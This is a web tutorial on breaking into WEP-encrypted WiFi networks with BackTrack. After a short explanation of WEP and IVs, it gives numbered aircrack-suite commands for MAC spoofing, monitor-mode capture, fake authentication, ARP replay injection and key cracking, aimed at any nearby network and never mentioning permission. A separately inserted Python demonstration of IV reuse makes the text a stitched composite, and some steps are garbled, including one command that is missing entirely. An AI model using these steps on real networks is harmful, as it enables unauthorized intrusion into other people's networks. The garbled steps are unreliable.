WiFi Hacking

WiFi Hacking Using BackTrack and Kali Linux

WiFi hacking has become a most important part of daily life for hackers and users alike.
This technique helps to break WiFi security.

How a wireless network works

A wireless local area network (WLAN) is the linking of 2 or more computers with Network Interface Cards (NICs) through a technology based on radio waves. All devices that can connect to a wireless network are known as stations. Stations can be access points (APs), or clients. 

Wireless Encryption
The majority of home and small business networks are encrypted using the two most popular methods: WEP and WPA.

WEP – Wired Equivalent Privacy – comes in 3 different key lengths: 64, 128, and 256 bits, known as WEP 64, WEP 128, and WEP 256 respectively. WEP provides a casual level of security but is more compatible with older devices; therefore, it is still used quite extensively. Each WEP key contains a 24-bit Initialization Vector (IV) and a user-defined or automatically generated key; for instance, WEP 128 is a combination of the 24-bit IV and a user-entered 26-digit hex key ((26*4)+24=128).

Packets and IVs
It’s all in the packets. The bottom line is – while you may be able to employ several security features on your WLAN – anything you broadcast over the air can be intercepted, and could be used to compromise the security on your network. If that frightens you, start stringing wires throughout your home.
Every encrypted packet contains a 24- or 48-bit IV, depending on the type of encryption used. Since the pre-shared key is static and could be easily obtained, the purpose of the IV is to encrypt each packet with a different key. For example, to avoid a duplicate encryption key in every packet sent, the IV is constantly changing. The IV must be known to the client that receives the encrypted packet in order to decrypt it; therefore, it is sent in plaintext.
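The per-packet key construction described above (cleartext 24-bit IV joined to the static key, fed to RC4) can be shown in a short added example that is not part of the original page. The key, IV and payloads are constructed sample values, the function names are this example's own, and the key-ID byte that follows the IV on the air is omitted; it shows why WEP cannot protect traffic once an IV repeats and how quickly a 24-bit IV space does repeat.

```python
import math, struct, zlib

def rc4(key: bytes, n: int) -> bytes:
    """First n bytes of the RC4 keystream for `key`."""
    s, j = list(range(256)), 0
    for i in range(256):                      # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for _ in range(n):                        # keystream generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def wep_seal(iv: bytes, key: bytes, data: bytes) -> bytes:
    """Cleartext 24-bit IV, then RC4(IV || key) over data + CRC-32 ICV.
    Simplification (assumption of this example): the key-ID byte is omitted."""
    if len(iv) != 3:
        raise ValueError("WEP IV is 24 bits")
    body = data + struct.pack("<I", zlib.crc32(data))
    return iv + xor(body, rc4(iv + key, len(body)))

def reuse_leak(c1: bytes, c2: bytes) -> bytes:
    """XOR of two sealed bodies; with equal IVs the keystream cancels out."""
    return xor(c1[3:], c2[3:])

def packets_until_repeat(prob: float = 0.5, iv_bits: int = 24) -> int:
    """Birthday estimate: packets with random IVs before a repeat is `prob` likely."""
    return math.ceil(math.sqrt(2 * 2**iv_bits * math.log(1 / (1 - prob))))

if __name__ == "__main__":
    key = bytes.fromhex("0123456789abcdef0123456789")   # constructed 26-hex-digit key
    p1, p2 = b"GET /index.html ", b"constructed data"   # constructed payloads
    iv = bytes.fromhex("00002a")                         # constructed IV
    c1, c2 = wep_seal(iv, key, p1), wep_seal(iv, key, p2)
    print("seed bits:", 8 * len(iv + key))               # 24 + 26*4
    print("same IV leaks p1^p2:", reuse_leak(c1, c2)[:16] == xor(p1, p2))
    print("packets for 50% IV repeat:", packets_until_repeat())
```

Because the static key never changes, the only remedy is to retire WEP in favour of WPA2 or WPA3 rather than to choose a longer WEP key.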

Step 1:-
First Download Backtrack 

Step 2:-
Burn the iso image on CD and boot your laptop from CD drive

Step 3:-
Select the third boot option (VESA/KDE).

Step 4:-
Once in BT3, click the tiny black box in the lower left corner to load up a "Konsole" window.

Step 5:-
Type the following command
Note down the interface name. In this example it is wifi0.

Step 6:-
airmon-ng stop wifi0

Step 7:-
ifconfig wifi0 down

Step 8:-
macchanger --mac 00:11:22:33:44:66 wifi0

Step 9:-
airmon-ng start wifi0

Step 10:-
airodump-ng wifi0
This will start populating WiFi networks. Press Ctrl + C to stop.
Check the network with WEP encryption.
Note down the BSSID, CH and ESSID somewhere in a notepad or on paper.
Note that if the same BSSID appears in the second part with a STATION associated with it, it means someone is accessing that network and our task will be a little easier.
If not, then don't worry, we will still crack it.

Step 11:-
airodump-ng -c (channel) -w (file name) --bssid (bssid) wifi0
Replace:
(channel) with the CH which you had already noted
(file name) with any name of your choice
(bssid) with the BSSID which you had already noted
Leave this console as it is and start a new konsole.

Step 12:-
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:66 wifi0
If you don't get the Association Successful message, then keep on trying until you succeed.

Step 13:-
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:66 wifi0
If you don't see ARP ACK and the sent packets are not increasing or are still 0, then it means no one is accessing that network. But don't worry, you have got an optional step.
Leave this console as it is and start a new konsole.

Step 14:-
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) -h 00:11:22:33:44:66 wifi0
Press y and enter.
Now you will see that the ARP and ACK packets in the 2nd console are increasing fast.
Keep this console as it is and start a 4th console.

Step 15:-
aircrack-ng -b (bssid) (filename)-
Just wait and watch... BackTrack will do the rest of the work.
Hurray, we got the key.



